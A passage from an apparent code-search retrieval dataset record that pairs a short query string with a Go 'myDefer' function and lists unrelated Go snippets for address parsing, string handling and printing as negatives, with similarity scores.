WithAddress(address string) Option {\n\treturn func(o *Options) {\n\t\to.Address = address\n\t}\n}", "func parseDialingAddress(ctx *context.T, vaddress string) (network string, address string, tag string, p flow.Protocol, err error) {\n\tparts := strings.SplitN(vaddress, \"/\", 3)\n\tif len(parts) != 3 {\n\t\treturn \"\", \"\", \"\", nil, ErrorfInvalidAddress(ctx, \"invalid vine address %v, address must be of the form 'network/address/tag'\", vaddress)\n\t}\n\tp, _ = flow.RegisteredProtocol(parts[0])\n\tif p == nil {\n\t\treturn \"\", \"\", \"\", nil, ErrorfNoRegisteredProtocol(ctx, \"no registered protocol: %v\", parts[0])\n\t}\n\treturn parts[0], parts[1], parts[2], p, nil\n}", "func DecodeString(addr string) (Address, error) {\n\t// Remove any leading slashes.\n\tif strings.HasPrefix(addr, \"/\") {\n\t\taddr = addr[1:]\n\t}\n\n\taddrParts := strings.Split(addr, \"/\")\n\tif len(addrParts) != 4 {\n\t\treturn Address{}, fmt.Errorf(\"invalid format %v\", addr)\n\t}\n\tvar protocol Protocol\n\tswitch addrParts[0] {\n\tcase \"tcp\":\n\t\tprotocol = TCP\n\tcase \"udp\":\n\t\tprotocol = UDP\n\tcase \"ws\":\n\t\tprotocol = WebSocket\n\tdefault:\n\t\treturn Address{}, fmt.Errorf(\"invalid protocol %v\", addrParts[0])\n\t}\n\tvalue := addrParts[1]\n\tnonce, err := strconv.ParseUint(addrParts[2], 10, 64)\n\tif err != nil {\n\t\treturn Address{}, err\n\t}\n\tvar sig id.Signature\n\tsigBytes, err := base64.RawURLEncoding.DecodeString(addrParts[3])\n\tif err != nil {\n\t\treturn Address{}, err\n\t}\n\tif len(sigBytes) != 65 {\n\t\treturn Address{}, fmt.Errorf(\"invalid signature %v\", addrParts[3])\n\t}\n\tcopy(sig[:], sigBytes)\n\treturn Address{\n\t\tProtocol: protocol,\n\t\tValue: value,\n\t\tNonce: nonce,\n\t\tSignature: sig,\n\t}, nil\n}", "func ParseAddressSpec(addrSpec string) (string, string, error) {\n\trs := regexp.MustCompile(`^([^@]+)@([^@]+)$`).FindStringSubmatch(addrSpec)\n\tif len(rs) < 1 {\n\t\treturn \"\", \"\", errors.New(\"RFC 5322 Address Spec not found.\")\n\t}\n\treturn rs[1], rs[2], nil\n}", "func (s *Script) ParseContractAddr() (*types.AddressContract, error) {\n\t_, operand, _, err := s.getNthOp(22, 0) // 1, 22\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif len(operand) != ripemd160.Size {\n\t\treturn nil, ErrInvalidContractScript\n\t}\n\tif bytes.Equal(operand, types.ZeroAddressHash[:]) {\n\t\t// contract deploy\n\t\treturn nil, nil\n\t}\n\treturn types.NewContractAddressFromHash(operand)\n}", "func NewFromString(addr string) (*Address, error) {\n\tlegaddr, err := legacy.Decode(addr)\n\tif err == nil {\n\t\taddr, err := NewFromLegacy(legaddr)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn addr, nil\n\t}\n\n\tcashaddr, err := cashaddress.Decode(addr, cashaddress.MainNet)\n\tif err == nil {\n\t\taddr, err := NewFromCashAddress(cashaddr)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn addr, nil\n\t}\n\n\treturn nil, errors.New(\"unable to decode address\")\n}", "func (d *IPOrDomain) AsAddress() Address {\n\tif d == nil {\n\t\treturn nil\n\t}\n\tswitch addr := d.Address.(type) {\n\tcase *IPOrDomain_Ip:\n\t\treturn IPAddress(addr.Ip)\n\tcase *IPOrDomain_Domain:\n\t\treturn DomainAddress(addr.Domain)\n\t}\n\tpanic(\"Common|Net: Invalid address.\")\n}", "func (a *Lisp_address) lisp_make_address(iid int, addr []byte) {\n\ta.instance_id = iid\n\ta.address = addr\n\ta.mask_len = len(a.address) * 8\n\ta.mask_address = net.CIDRMask(a.mask_len, len(a.address) * 8)\n}", "func ParseCode(addr string) (string, error) {\n\tl := len(addr)\n\tif l < 50 {\n\t\treturn \"\", InvalidAccountAddrError{reason: \"length\"}\n\t}\n\ti := l - 50 // start index of hex\n\treturn strings.ToUpper(addr[0:i]), nil\n}", "func (_Contract *ContractFilterer) ParseAddressChanged(log types.Log) (*ContractAddressChanged, error) {\n\tevent := new(ContractAddressChanged)\n\tif err := _Contract.contract.UnpackLog(event, \"AddressChanged\", log); err != nil {\n\t\treturn nil, err\n\t}\n\treturn event, nil\n}" ]
[ "0.6095162", "0.5969518", "0.5851808", "0.575989", "0.57291037", "0.56328076", "0.56151664", "0.5525519", "0.546415", "0.5449659", "0.5433965", "0.54182434", "0.5393001", "0.53877", "0.535847", "0.53314054", "0.5328453", "0.5295815", "0.5283535", "0.52241075", "0.51893", "0.51830244", "0.51726466", "0.5170505", "0.5155107", "0.5150874", "0.51272833", "0.51049274", "0.50938684", "0.5079866", "0.50529313", "0.505189", "0.5051323", "0.50284284", "0.5025574", "0.49976954", "0.49944714", "0.49927184", "0.49858388", "0.4976967", "0.49740314", "0.4968268", "0.49471465", "0.4945239", "0.49434063", "0.4928218", "0.492503", "0.49212694", "0.4903165", "0.48896053", "0.4887786", "0.4883186", "0.48828033", "0.48822474", "0.48806676", "0.48785502", "0.4867127", "0.48624322", "0.48339543", "0.48292747", "0.4809095", "0.4808597", "0.47989464", "0.4790509", "0.47892252", "0.47777545", "0.4775372", "0.47663507", "0.4762729", "0.4757166", "0.4754483", "0.47541744", "0.47530755", "0.47454432", "0.47446048", "0.4743204", "0.4734672", "0.47220144", "0.47192022", "0.47183502", "0.47052982", "0.46878326", "0.46707126", "0.46699095", "0.46563306", "0.46554697", "0.46543172", "0.46540877", "0.46532091", "0.46532091", "0.46447438", "0.463768", "0.46339583", "0.46304432", "0.46286643", "0.46239027", "0.46127176", "0.46125937", "0.46086967", "0.459781" ]
0.80320567
0
world, One, Two 0, 1, 2, 3, 4 hello, 43210, two, One, world
func myDefer() { for i := 0; i < 5; i++ { defer fmt.Print(i) } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func main() {\n\n\t// here basically we have converted the Hello in to byte stream which represents the byte for each character.\n\t// Now we get out put as [72 101 108 108 111] where 72 represents the \"H\" in UTF-8 table, 101 represents \"e\" and so on.\n\tfmt.Println([]byte(\"Hello\"))\n\n\tfor i := 5000; i < 5100; i++ {\n\t\tfmt.Printf(\"%v - %v - %v \\n\", i, string(i), []byte(string(i)))\n\t}\n\n}", "func main() {\n\t//NOTE there are two blanks after comma(,)\n\ttracer := \"死神來了, 死神bye bye\"\n\n\tcomma := strings.Index(tracer, \",\")\n\tfmt.Printf(\"comma is %d\\n\", comma)\n\n\tpos := strings.Index(tracer[comma:], \"死神\")\n\tfmt.Printf(\"pos is %d\\n\", pos)\n\n\tfmt.Println(comma, pos, tracer[comma+pos:])\n\tfmt.Println(comma, pos, tracer[comma:])\n\n\t//sol. \n\t//死 神 來 了 , 死 神 b y e b y e\n\t//0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26\n\tfmt.Printf(\"len of tracer is %d\\n\", utf8.RuneCountInString(tracer))\n}", "func PartOne(input string) (string, error) {\n\toverall := 0\n\tfor _, line := range strings.Split(input, \"\\n\") {\n\t\troom := roomData(line)\n\n\t\tif room.isValid() {\n\t\t\toverall += room.getSectorID()\n\t\t}\n\t}\n\n\treturn strconv.Itoa(overall), nil\n}", "func main() {\n\tdataStr := \"the data is big\"\n\t//words from the string\n\twords := strings.Fields(dataStr)\n\tfor c := range words{\n\t\tprintln(words[c])\n\t}\n\t//comparition\n\tprintln(\"the string comparition\" , strings.Compare(\"Gowtham\" , \"gowtham\"))\n\tprintln(\"the string contains\" , strings.ContainsAny(dataStr,\"the\"))\n\tprintln(\"the rune contains \",strings.ContainsRune(dataStr,'s'))\n\t// more operation you can see in strings package\n}", "func PartOne(input string) (string, error) {\n\tcharmaps := getCharMaps(parseLines(input))\n\n\tvar code string\n\n\tfor _, val := range charmaps {\n\t\tsortedList := mapsorter.MapToList(val)\n\t\tsort.Sort(sort.Reverse(sortedList))\n\t\tcode += string(sortedList[0].Key)\n\t}\n\n\treturn code, nil\n}", "func main() {\n\ts := \"0000001234567890\"\n\tfmt.Printf(\"%s\\n\", comma(s))\n}", "func main() {\n\tphrase := \"These are the times that try men's souls.\\n\"\n\n\t// divide phrase into individual strings using `strings` package `Split` function\n\twords := strings.Split(phrase, \" \")\n\n\t// create channel for strings with capacity for all the words\n\tch := make(chan string, len(words))\n\n\t// go over slide of words pushing into channel\n\tfor _, word := range words {\n\t\tch <- word\n\t}\n\n\t// drain channel\n\tfor i := 0; i < len(words); i++ {\n\t\tfmt.Print(<-ch + \" \")\n\t}\n}", "func part1() {\n\ts := \"abc\"\n\tcount := 0\n\ti := 0\n\th := md5.New()\n\tbuffer := bytes.NewBuffer(make([]byte, 64))\n\n\tfor count < 8 {\n\t\tbuffer.Reset()\n\t\tfmt.Fprintf(buffer, \"%s%d\", s, i)\n\n\t\th.Reset()\n\t\th.Write(buffer.Bytes())\n\t\tdigest := h.Sum(nil)\n\t\tif digest[0] == 0 && digest[1] == 0 && digest[2] < 16 {\n\t\t\tfmt.Printf(\"%x\", digest[2])\n\t\t\tcount++\n\t\t}\n\t\ti++\n\t}\n\tfmt.Println()\n}", "func GenWord() string {\n\tcount := 1000\n\tresult := \"\"\n\tfor i := 0; i < count; i++ {\n\t\tresult += \" Hello world!....\\n\"\n\t}\n\n\treturn result\n}", "func PartOne(r io.Reader, w io.Writer) error {\n\tmotions, err := motionsFromReader(r)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"could not read input: %w\", err)\n\t}\n\n\tcount := countUniqueTailPositions(motions, 2)\n\n\t_, err = fmt.Fprintf(w, \"%d\", count)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"could not write answer: %w\", err)\n\t}\n\n\treturn nil\n}", "func main() {\n\n\tdata := []string {\"a\", \"b\", \"c\", \"d\", \"e\"}\n\tfmt.Println(data[0])\n\tfmt.Println(data[0:3])\n\tfmt.Println(data[3:4])\n\tfmt.Println(data[:])\n\n\t/* will print\n\ta\n\t[a b c]\n\t[d]\n\t[a b c d e]\n\t */\n\t\n}", "func countAndSay(n int) string {\n\tif n <= 1{\n\t\treturn \"1\"\n\t}\n\tvar last string = \"1\"\n\tfor i := 2;i <= n;i++{\n\t\tslow := 0\n\t\tfast := slow + 1\n\t\t//var cur string\n\t\tvar cur bytes.Buffer\n\t\tl := len(last)\n\t\tfor fast <= l{\n\t\t\tif fast < len(last) && last[slow] == last[fast]{\n\t\t\t\tfast++\n\t\t\t}else{\n\t\t\t\t//l := fast - slow\n\t\t\t\t//cnt := strconv.Itoa(l)\n\t\t\t\t//num := string(last[slow])\n\t\t\t\t//cur += cnt + num\n\t\t\t\tcur.WriteString(strconv.Itoa(fast - slow))\n\t\t\t\tcur.WriteByte(last[slow])\n\t\t\t\tslow = fast\n\t\t\t\tfast++\n\t\t\t}\n\t\t}\n\t\tlast = cur.String()\n\t\tif i == n{\n\t\t\treturn last\n\t\t}\n\t}\n\treturn last\n}", "func main() {\n\tb, _ := ioutil.ReadAll(os.Stdin)\n\torig := strings.Split(string(b), \",\")\n\n\tfor i := 0; i < 100; i++ {\n\t\tfor j := 0; j < 100; j++ {\n\t\t\tprog := make([]string, len(orig))\n\t\t\tcopy(prog, orig)\n\t\t\tnoun := strconv.Itoa(i)\n\t\t\tverb := strconv.Itoa(j)\n\t\t\tprog[1] = noun\n\t\t\tprog[2] = verb\n\n\t\t\tcode := \"0\"\n\t\t\tpc := 0\n\t\tLoop:\n\t\t\tfor {\n\t\t\t\tcode = prog[pc]\n\t\t\t\tswitch code {\n\t\t\t\tcase \"1\":\n\t\t\t\t\tp1 := atoi(prog[pc+1])\n\t\t\t\t\top1 := atoi(prog[p1])\n\t\t\t\t\tp2 := atoi(prog[pc+2])\n\t\t\t\t\top2 := atoi(prog[p2])\n\t\t\t\t\tp3 := atoi(prog[pc+3])\n\n\t\t\t\t\tprog[p3] = strconv.Itoa(op1 + op2)\n\t\t\t\t\tpc = pc + 4\n\t\t\t\tcase \"2\":\n\t\t\t\t\tp1 := atoi(prog[pc+1])\n\t\t\t\t\top1 := atoi(prog[p1])\n\t\t\t\t\tp2 := atoi(prog[pc+2])\n\t\t\t\t\top2 := atoi(prog[p2])\n\t\t\t\t\tp3 := atoi(prog[pc+3])\n\n\t\t\t\t\tprog[p3] = strconv.Itoa(op1 * op2)\n\t\t\t\t\tpc = pc + 4\n\t\t\t\tcase \"99\":\n\t\t\t\t\tif prog[0] == \"19690720\" {\n\t\t\t\t\t\tfmt.Println(\"HALT!\")\n\t\t\t\t\t\tfmt.Printf(\"noun %v verb %v \\n\", noun, verb)\n\t\t\t\t\t\tfmt.Println(\"POS 0\", prog[0])\n\t\t\t\t\t}\n\t\t\t\t\tbreak Loop\n\t\t\t\tdefault:\n\t\t\t\t\tpanic(\"oh dear\")\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n}", "func analyze(data string) ([]int, []string) {\n\tvar spaces []int\n\tvar fields []string\n\tcounter := 0\n\tsubstring := \"\"\n\n\tfor i := 0; i < len(data); i++ {\n\t\tif data[i] == 32 {\n\t\t\tif substring != \"\" {\n\t\t\t\tspaces = append(spaces, counter)\n\t\t\t\tfields = append(fields, substring)\n\t\t\t\tsubstring = \"\"\n\t\t\t\tcounter = 0\n\t\t\t}\n\t\t\tcounter++\n\t\t} else {\n\t\t\tsubstring += string(data[i])\n\t\t}\n\t}\n\n\tspaces = append(spaces, counter)\n\tfields = append(fields, substring)\n\n\treturn spaces, fields\n}", "func main() {\n\tstrings := []string{\n\t\t\"cool\",\n\t\t\"güzel\",\n\t\t\"jīntiān\",\n\t\t\"今天\",\n\t\t\"read 🤓\",\n\t}\n\n\t_ = strings\n\n\t// Print the byte and rune length of the strings\n\t// Hint: Use len and utf8.RuneCountInString\n\tfor _, s := range strings {\n\t\tfmt.Printf(\"Byte length: %-3d, rune length: %-3d\\n\", len(s),\n\t\t\tutf8.RuneCountInString(s))\n\t}\n\n\t// Print the bytes of the strings in hexadecimal\n\t// Hint: Use % x verb\n\n\t// Print the runes of the strings in hexadecimal\n\t// Hint: Use % x verb\n\n\t// Print the runes of the strings as rune literals\n\t// Hint: Use for range\n\n\t// Print the first rune and its byte size of the strings\n\t// Hint: Use utf8.DecodeRuneInString\n\n\t// Print the last rune of the strings\n\t// Hint: Use utf8.DecodeLastRuneInString\n\n\t// Slice and print the first two runes of the strings\n\n\t// Slice and print the last two runes of the strings\n\n\t// Convert the string to []rune\n\t// Print the first and last two runes\n}", "func readFields(r io.Reader)(o rune,t rune,b int,e int,f int,s string,err error){\nvar l int\nif _,err= fmt.Fscanf(r,\"%c%c%d %d %d %d\",&o,&t,&b,&e,&f,&l);err!=nil{\nreturn\n}\nif l!=0{\nrs:=make([]rune,l)\nfor i:=0;i<l;i++{\nif _,err= fmt.Fscanf(r,\"%c\",&rs[i]);err!=nil{\nreturn\n}\n}\ns= string(rs)\n}\nvar nl[1]byte\nif _,err= r.Read(nl[:]);err!=nil{\nreturn\n}\nreturn\n}", "func HolderString(n int) string {\n\tvar builder strings.Builder\n\tbuilder.Grow((n-1)*2 + 1)\n\tfor i := 0; i < n; i++ {\n\t\tif i > 0 {\n\t\t\tbuilder.WriteString(\",\")\n\t\t}\n\t\tbuilder.WriteString(\"?\")\n\t}\n\treturn builder.String()\n}", "func splitNumbersString(pinyin string) []word {\n words := strings.Fields(pinyin)\n\n splitPinyin := make([]word, len(words))\n\n for i, v := range words {\n lastChar := v[len(v)-1:]\n\n if unicode.IsNumber(rune(lastChar[0])) {\n n, _ := strconv.Atoi(lastChar)\n\n // convert 5's to 0's for neutral tones\n if n == 5 {\n n = 0\n }\n splitPinyin[i] = word{syllable: v[0 : len(v)-1], tone: n}\n } else {\n splitPinyin[i] = word{syllable: v, tone: -1}\n }\n }\n return splitPinyin\n}", "func boring4(msg string) <-chan string {\n\tc := make(chan string)\n\tgo func() {\n\t\tfor i:=0; ; i++ {\n\t\t\tc <- fmt.Sprintf(\"%s %d\", msg, i)\n\t\t\ttime.Sleep(time.Duration(rand.Intn(1e3))* time.Millisecond)\n\t\t}\n\t}()\n\treturn c\n}", "func indexHandler1( w http.ResponseWriter, r *http.Request){\n\n\treg, err := regexp.Compile(\"[^a-zA-Z0-9]+\")\n\tfmt.Fprintf(w, \"word\"+\" \"+\"count\")\n\tfmt.Fprintf(w,\"\\n----------\\n\")\n\tfor key, val := range wordcountMap {\n\n\t\tfmt.Println(strings.TrimRight(key, \" \"), val)\n\t\tfmt.Fprintf(w, reg.ReplaceAllString(key, \"\")+\" \"+strconv.Itoa(val))\n\t\tfmt.Fprintf(w,\"\\n\")\n\n\t}\n\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n}", "func main() {\n\tfirst, last := greet(\"Luis \", \"Benavides \")\n\tfmt.Printf(\"%s %s \\n\", first, last)\n}", "func getWord(begin, end int, t string) string {\n for end >= len(t) {\n return \"\"\n }\n d := make([]uint8, end-begin+1)\n for j, i := 0, begin; i <= end; i, j = i+1, j+1 {\n d[j] = t[i]\n }\n return string(d)\n}", "func stringToMatrix(msg string) myParameters {\n\tclientid := (int(msg[0]) - '0')\n\ti := 4\n\theight := 0\n\twidth := 0\n\tturn := 0\n\tthread := 0\n\n\tfor i < len(msg) && msg[i] != ' ' {\n\t\theight = height*10 + (int(msg[i]) - '0')\n\t\ti++\n\t}\n\ti++\n\tfor i < len(msg) && msg[i] != ' ' {\n\t\twidth = width*10 + (int(msg[i]) - '0')\n\t\ti++\n\t}\n\ti++\n\tfor i < len(msg) && msg[i] != ' ' {\n\t\tturn = turn*10 + (int(msg[i]) - '0')\n\t\ti++\n\t}\n\ti++\n\tfor i < len(msg) && msg[i] != ' ' {\n\t\tthread = thread*10 + (int(msg[i]) - '0')\n\t\ti++\n\t}\n\ti++\n\tnr := i\n\tworld := make([][]byte, height)\n\tfor i := range world {\n\t\tworld[i] = make([]byte, width)\n\t}\n\tfor i := 0; i < height; i++ {\n\t\tfor j := 0; j < width; j++ {\n\t\t\tworld[i][j] = msg[nr] - '0'\n\t\t\tnr++\n\n\t\t}\n\t\tnr++\n\t}\n\treturn myParameters{\n\t\tclientid,\n\t\tworld,\n\t\theight,\n\t\twidth,\n\t\tturn,\n\t\tthread,\n\t}\n\n}", "func splitLine(line string) {\n\t//token := strings.TrimSpace(line)\n\ttoken := line\n\ttoken1 := \"\"\n\tline1 := \"\"\n\tfor i := 0; i < len(token); i++ {\n\t\tif token[i] == ' ' || token[i] == '\t' {\n\t\t\tcontinue\n\t\t} else {\n\t\t\ttoken1 = token1 + string(token[i])\n\t\t}\n\t}\n\t//fmt.Println(token1)\n\tif len(token1) > 11 {\n\t\tif token1[:12] == \"//PROXYBEGIN\" {\n\t\t\tproxycounter = 0\n\t\t\tline1 = strings.TrimSpace(token[13:])\n\t\t\tfmt.Printf(\"%-28s\\t\", line1)\n\t\t\tfmt.Print(\"1\\t\\t\")\n\t\t}\n\t}\n\tif len(token1) > 9 {\n\t\tif token1[:10] == \"//PROXYEND\" {\n\t\t\tfmt.Println(proxycounter - 1)\n\t\t}\n\t}\n\n}", "func basic(s string, n int) string {\n\tt := s[n:]\n\tt += s[:n]\n\treturn t\n}", "func Main() {\n\t// var s string\n\t// s = \"hello\"\n\t// s = \"\\xE4\"\n\t// s = \"中华\"\n\t// s[1] = \"3\" // string 是不可变的byte数组\n\t// fmt.Println(s)\n\t// fmt.Println(len(s))\n\n\t// c := []rune(s)\n\t// fmt.Println(len(c))\n\t// fmt.Printf(\"中 unicode %x\", c[0])\n\t// fmt.Printf(\"中 UTF8 %x\", s)\n\n\t// for _, v := range s {\n\t// \t// fmt.Println(v)\n\t// \tfmt.Printf(\"%[1]c %[1]d\", v)\n\t// }\n\t// s := \"a,b,c\"\n\t// parts := strings.Split(s, \",\")\n\t// for _, v := range parts {\n\t// \tfmt.Println(v)\n\t// }\n\t// fmt.Println(strings.Join(parts, \"-\"))\n\n\t// n := strconv.Itoa(10)\n\t// fmt.Println(\"s\" + n)\n\n\t// fmt.Println(strconv.Atoi(\"10\"))\n\n\t// if i, err := strconv.Atoi(\"10\"); err == nil {\n\t// \tfmt.Println(10 + i)\n\t// }\n}", "func step4(w string) string {\n\tln := len(w)\n\tif ln < r1 {\n\t\treturn w\n\t}\n\n\tlastLetter := w[len(w)-1 : len(w)]\n\tfor _, letter := range vowels {\n\t\tif lastLetter == letter {\n\t\t\treturn w\n\t\t}\n\t}\n\tbeforeLastLetter := w[len(w)-2 : len(w)-1]\n\tif lastLetter == beforeLastLetter {\n\t\treturn w[0 : len(w)-1]\n\t}\n\n\treturn w\n}", "func wordsMessage(str string) (buf []string, result string) {\n buf = make([]string, 5);\n var start, end, pos int;\n result = \"\";\n leng := len(str);\n for {\n for start < leng && str[start] == ' ' { start++; }\n if start == leng { break; }\n if str[start] == ':' { result = str[start+1:len(str)]; break; }\n for end = start+1; end < leng && str[end] != ' '; { end++; }\n if pos >= len(buf) {\n buf2 := make([]string, len(buf)*2);\n for i, x := range buf { buf2[i] = x; }\n buf = buf2;\n }\n buf[pos] = str[start:end];\n pos++;\n start = end;\n }\n buf = buf[0:pos];\n return;\n}", "func main() {\n\tmessage := \"HELLO WELCOME\"\n\tvar cipher byte = 1\n\tfmt.Printf(\"Length of message: %v\\n\", len(message))\n\tfor i := 0; i < len(message); i++ {\n\t\tc := message[i] + cipher\n\t\tfmt.Printf(\"%c\\n\", c)\n\t}\n}", "func bomberMan(n int32, grid []string) []string {\n\tif n == 1 {\n\t\treturn grid\n\t}\n\n\tif n%2 == 0 {\n\t\tfor index, str := range grid {\n\t\t\tr := []rune(str)\n\t\t\tfor i, ch := range r {\n\t\t\t\tif ch != 'O' {\n\t\t\t\t\tr[i] = 'O'\n\t\t\t\t}\n\t\t\t}\n\t\t\tgrid[index] = string(r)\n\t\t}\n\t\treturn grid\n\t}\n\n\tif n%4 == 3 {\n\t\treturn Explode(grid)\n\t}\n\n\treturn Explode(Explode(grid))\n}", "func main() {\n\tvar x = \"Hallo, bin Marcell Davis\";\n}", "func appendContentNumeric(content string) (int, Burst) {\n\tout := make(Burst, 0)\n\tdebugf(\"appendContentNumeric: %s\", content)\n\tif mod5 := len(content) % 5; mod5 > 0 {\n\t\tcontent = content + strings.Repeat(\" \", 5-mod5)\n\t\tdebugf(\"padding to a multiple of 5 chars: '%s'\", content)\n\t}\n\n\t// 084 2.6]195-3U7[\n\tcharMap := map[byte]byte{ // Bit reversals\n\t\t'0': 0, '8': 1, '4': 2, ' ': 3, '2': 4, '.': 5, '6': 6, ']': 7,\n\t\t'1': 8, '9': 9, '5': 10, '-': 11, '3': 12, 'U': 13, '7': 14, '[': 15,\n\t}\n\n\tbitpos := 0\n\tword := uint32(0)\n\tleftbits := 0\n\tpos := 0\n\n\t// walk through characters in message\n\tfor i, r := range content {\n\t\tvar char byte\n\t\tvar ok bool\n\t\t// set char from the charMap, and skip the character is not in the map\n\t\tif char, ok = charMap[byte(r)]; !ok {\n\t\t\tdebugf(\"skipping invalid char '%s'\", string(r))\n\t\t\tcontinue\n\t\t}\n\n\t\tdebugf(\" char %d: '%s' --> %d [%X]\\n\", i, string(r), char, char)\n\n\t\t// if the bits won't fit:\n\t\tif bitpos+4 > 20 {\n\t\t\tspace := 20 - bitpos\n\t\t\t// leftbits least significant bits of $char are left over in the next word\n\t\t\tleftbits = 4 - space\n\t\t\tdebugf(\" bits of char won't fit since bitpos is %d, got %d bits free, leaving %d bits in next word\", bitpos, space, leftbits)\n\t\t}\n\n\t\tword |= (uint32(char) << uint(31-4-bitpos))\n\n\t\tbitpos += 4\n\n\t\tif bitpos >= 20 {\n\t\t\tdebugf(\" appending word: %X\\n\", word)\n\t\t\tout = append(out, appendMessageCodeword(word))\n\t\t\tpos++\n\t\t\tword = 0\n\t\t\tbitpos = 0\n\t\t}\n\n\t\tif leftbits > 0 {\n\t\t\tword |= (uint32(char) << uint(31-leftbits))\n\t\t\tbitpos = leftbits\n\t\t\tleftbits = 0\n\t\t}\n\t}\n\n\treturn pos, out\n}", "func CuttingStrings() {\n\n\tstream := []string{\n\t\t\"host:a,role:web,availability-zone:us-east-1a\",\n\t\t\"host:b,role:web,availability-zone:us-east-1b\",\n\t\t\"host:a,role:web,availability-zone:us-east-1a\",\n\t\t\"host:c,role:db,db_role:master,availability-zone:us-east-1e\",\n\t\t\"host:d,role:db,db_role:replica,availability-zone:us-east-1a\",\n\t\t\"host:e,role:intake,availability-zone:us-east-1a\",\n\t\t\"host:e,role:intake,availability-zone:us-east-1a\",\n\t\t\"host:f,role:kafka,availability-zone:us-east-1a\",\n\t}\n\n\tret := make(map[string]int)\n\n\tfor _,s := range stream {\n\t\tparts := strings.Split(s,\",\")\n\t\tfor _,p := range parts {\n\t\t\tif _,ok := ret[p];ok {\n\t\t\t\tret[p] += 1\n\t\t\t}else {\n\t\t\t\tret[p] = 1\n\t\t\t}\n\t\t}\n\t}\n\n\tfor key,item := range ret{\n\t\tfmt.Println(key,item)\n\t}\n}", "func FirstWord(bytes []byte) int {\n\treturn WordEnd(bytes, 0)\n}", "func main() {\n\n\tscanner := bufio.NewScanner(os.Stdin)\n\n\tfor scanner.Scan() {\n\t\tinstr := ParseInstr(strings.Split(scanner.Text(), \",\"))\n\n\t\tinput := \"abcdefghijklmnop\"\n\t\tseen := make(map[string]string)\n\n\t\tfmt.Println(string(Run16(input, instr)))\n\t\trounds := 1000000000\n\n\t\tfor i := 1; i <= rounds; i++ {\n\t\t\tif i % (rounds/10) == 0 {\n\t\t\t\tfmt.Print(\"/\")\n\t\t\t} else if i % (rounds/100) == 0 {\n\t\t\t\tfmt.Print(\".\")\n\t\t\t}\n\t\t\t\n\t\t\t// Cache known results. Suspect we could cache repeating patterns, but this is fast enough.\n\t\t\tcache, exists := seen[input]\n\t\t\tif exists {\n\t\t\t\tinput = cache\n\t\t\t} else {\n\t\t\t\tpre := input\n\t\t\t\tinput = Run16(input,instr)\n\t\t\t\tseen[pre] = input\n\t\t\t}\n\t\t}\n\n\t\tfmt.Println()\n\t\tfmt.Println(input)\n\t}\n}", "func main() {\n\tvar start, stop int\n\n\tif args := os.Args[1:]; len(args) == 2 {\n\t\tstart, _ = strconv.Atoi(args[0])\n\t\tstop, _ = strconv.Atoi(args[1])\n\t}\n\n\tif stop == 0 || start == 0 {\n\t\tstop, start = 'Z', 'A'\n\t}\n\tfmt.Printf(\"%-10s %-10s %-10s %-10s\\n%s\\n\", \"literal\", \"dec\", \"hex\", \"encoded\",\n\t\tstrings.Repeat(\"-\", 45))\n\n\tfor n := start; n <= stop; n++ {\n\t\t// space denotes utf8 encoding % -12[1]x\\n\n\t\tfmt.Printf(\"%-10c %-10[1]d %-10[1]x % -12x\\n\", n, string(n))\n\t}\n}", "func handler(w http.ResponseWriter, r *http.Request) {\n\tnumbers := []string{\"Hello\", \"BYE\"}\n\tfmt.Fprintf(w, numbers[0])\n}", "func Part2(ctx context.Context, input string) (interface{}, error) {\n\tlines := strings.Split(input, \"\\n\")\n\tbusses := strings.Split(lines[1], \",\")\n\n\toffsets := map[int]int{}\n\n\tfor i, bus := range busses {\n\t\tif bus == \"x\" {\n\t\t\tcontinue\n\t\t}\n\n\t\tbusID, err := strconv.Atoi(bus)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\toffsets[-i] = busID // Using -i because of modular congruences\n\t}\n\n\t/*\n\t\tRemember modular congruence\n\t\t(t + i) mod p = 0\n\t\t⇒ (t + i) ≡ 0 (mod p)\n\t\t⇒ t ≡ -i (mod p) ≡ p - i (mod p)\n\n\t\ti.e.\n\t\tt ≡ -offset (mod busID)\n\t*/\n\treturn ChineseRemainder(offsets), nil\n}", "func HelloToWorld(helloStr string) string {\n\tvar result string\n\ttokens := strings.Split(helloStr, \" \")\n\n\tfor _, token := range tokens {\n\t\tif strings.ToLower(token) == \"hello\" {\n\t\t\tresult += \"world\"\n\t\t} else {\n\t\t\tresult += token\n\t\t}\n\n\t\tresult += \" \"\n\t}\n\n\treturn result\n}", "func shift_left_twice(key_chunk string) string {\n\tshifted := \"\"\n\tfor i := 0; i < 2; i++ {\n\t\tfor j := 1; j < 28; j++ {\n\t\t\tshifted += string(key_chunk[j])\n\t\t}\n\t\tshifted += string(key_chunk[0])\n\t\tkey_chunk = shifted\n\t\tshifted = \"\"\n\t}\n\treturn key_chunk\n}", "func main() {\n\tvar name string\n\ts := \"Gopher นำแน่!!!\"\n\ti := 5\n\tf := 3.7\n\tb := true\n\tr := '界'\n\n\tfmt.Printf(\"name: %q\\n\", name)\n\tfmt.Printf(\"type: %T\\n\", name)\n\n\tfmt.Printf(\"int: %v\\n\", i)\n\tfmt.Printf(\"float64: %v\\n\", f)\n\tfmt.Printf(\"bool: %v\\n\", b)\n\tfmt.Printf(\"string: %v\\n\", s)\n\tfmt.Printf(\"rune: %v\\n\", r)\n\n}", "func splice_int_key(keys generator.Fieldvec_t) string {\r\n\tvar n_key int = len(keys)\r\n\tif n_key <= 1 {\r\n\t\treturn \"\"\r\n\t}\r\n\r\n\tvar ret string = \"\"\r\n\tswitch n_key {\r\n\t// 2个主键\r\n\tcase 2:\r\n\t\tret = \"uint64 key = keytool::Get3232Key(\"\r\n\t\tret += keys[0].En_name\r\n\t\tret += \", \"\r\n\t\tret += keys[1].En_name\r\n\t\tret += \");\"\r\n\t\tbreak\r\n\r\n\t\t// 3个主键\r\n\tcase 3:\r\n\t\tret = \"uint64 key = keytool::Get161616Key(\"\r\n\t\tret += keys[0].En_name\r\n\t\tret += \", \"\r\n\t\tret += keys[1].En_name\r\n\t\tret += \", 